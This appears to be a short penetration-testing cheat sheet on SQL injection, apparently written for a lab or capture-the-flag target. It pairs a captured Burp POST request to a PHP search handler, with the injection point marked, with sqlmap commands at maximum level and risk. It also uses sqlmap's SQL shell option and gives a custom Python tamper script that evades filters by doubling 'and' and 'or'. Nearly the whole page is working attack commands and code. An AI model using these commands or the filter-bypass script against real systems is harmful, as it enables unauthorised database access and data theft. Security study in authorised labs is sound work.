Skip to content

SQL Injection

sqlmap + Burp Suite

Save the request file from Burp and add * which parameter you want to inject 

POST /Controllers/Handlers/SearchHandler.php HTTP/1.1
Host: 83.136.254.199:49767
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Transfer-Encoding: chunked

search=6*
0

Then, execute the below command: 

sqlmap -r request_file  --level 3 --risk 3

If succeed, then pop an SQL shell; 

sqlmap -r request_file --sql-shell

Creating Custom Tamper Scripts

Create a new python file bypass.py and add the following code:

#!/usr/bin/env python

__priority__ = 1

def dependencies():
    pass

def tamper(payload:str, **kwargs):
    modified_payload = payload.lower().replace("and", "aandnd").replace("or", "oorr")
    return modified_payload

Also create an empty file __init__.py in the same directory. touch __init__.py

Then, execute the below command: 

sqlmap -r request_file --tamper bypass.py --level 3 --risk 3